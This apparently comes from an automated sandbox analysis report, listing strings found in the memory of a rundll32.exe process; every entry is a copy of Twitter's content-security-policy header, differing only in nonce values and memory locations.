Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MjVkMzA1MWMtMWQ2Mi00MjE1LWFlY2EtNmRhMDE2M2IwMGI4'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508667623.000001DEAA290000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MmZhNWY3NWMtOTc1Mi00NTFlLThmMWEtZDA4MTFhMDhmZjUx'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547487384.000001DEA8549000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzIwYzUwYzEtNWQ3YS00YWRlLTgyY2EtZGM2NmNjOTdhNTVj'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.321010189.000001DEA855B000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-MzdiNWFlNWYtZmJjNy00YTg1LTgxNzQtYWQ1YWM5N2Y0Y2Ux'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.581005966.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-NDRlZTViOTctYTg1Yy00ZTc5LWE4YjUtYmI2ODA0Njg5NDNh'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.450020972.000001DEAA29B000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-NTY3Mjg2Y2QtMjY0MS00N2FmLWIxZjctYzg1ODZjNThkNWNk'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508667623.000001DEAA290000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-OTRlMzI0MzktZTVmNC00NGZhLWIxMmQtOWVkOWQzNGVhMDZj'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.426876801.000001DEA8573000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-OWZkODBmZTEtNWFjNS00MzY1LWI1ODUtNTk0NzQ3MGZhMjhi'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.508667623.000001DEAA290000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YTNhMGIyZWUtMTQ0Ni00OGQ2LWI4MjgtODdlN2Q5ZjQ3YzNi'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000003.547778922.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YTcxYzRjNGYtOTM4Ny00MWI4LTg0NTAtMGJiZDExNDliMThl'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
Source: rundll32.exe, 00000002.00000002.581005966.000001DEAA298000.00000004.00000001.sdmpString found in binary or memory: content-security-policy: connect-src 'self' blob: https://*.giphy.com https://*.pscp.tv https://*.video.pscp.tv https://*.twimg.com https://api.twitter.com https://api-stream.twitter.com https://ads-api.twitter.com https://caps.twitter.com https://media.riffsy.com https://pay.twitter.com https://sentry.io https://ton.twitter.com https://twitter.com https://upload.twitter.com https://www.google-analytics.com https://app.link https://api2.branch.io https://bnc.lt https://vmap.snappytv.com https://vmapstage.snappytv.com https://vmaprel.snappytv.com https://vmap.grabyo.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net ; default-src 'self'; form-action 'self' https://twitter.com https://*.twitter.com; font-src 'self' https://*.twimg.com; frame-src 'self' https://twitter.com https://mobile.twitter.com https://pay.twitter.com https://cards-frame.twitter.com ; img-src 'self' blob: data: https://*.cdn.twitter.com https://ton.twitter.com https://*.twimg.com https://analytics.twitter.com https://cm.g.doubleclick.net https://www.google-analytics.com https://www.periscope.tv https://www.pscp.tv https://media.riffsy.com https://*.giphy.com https://*.pscp.tv https://*.periscope.tv https://prod-periscope-profile.s3-us-west-2.amazonaws.com https://platform-lookaside.fbsbx.com https://scontent.xx.fbcdn.net https://*.googleusercontent.com; manifest-src 'self'; media-src 'self' blob: https://twitter.com https://*.twimg.com https://*.vine.co https://*.pscp.tv https://*.video.pscp.tv https://*.giphy.com https://media.riffsy.com https://dhdsnappytv-vh.akamaihd.net https://pdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://mdhdsnappytv-vh.akamaihd.net https://mpdhdsnappytv-vh.akamaihd.net https://mmdhdsnappytv-vh.akamaihd.net https://dwo3ckksxlb0v.cloudfront.net; object-src 'none'; script-src 'self' 'unsafe-inline' https://*.twimg.com https://www.google-analytics.com https://twitter.com https://app.link 'nonce-YThmMjMxOTgtNjdkOS00ZWZlLTkzMWQtZWRlNTliZTQ1NzYx'; style-src 'self' 'unsafe-inline' https://*.twimg.com; worker-src 'self' blob:; report-uri https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false equals www.twitter.com (Twitter)
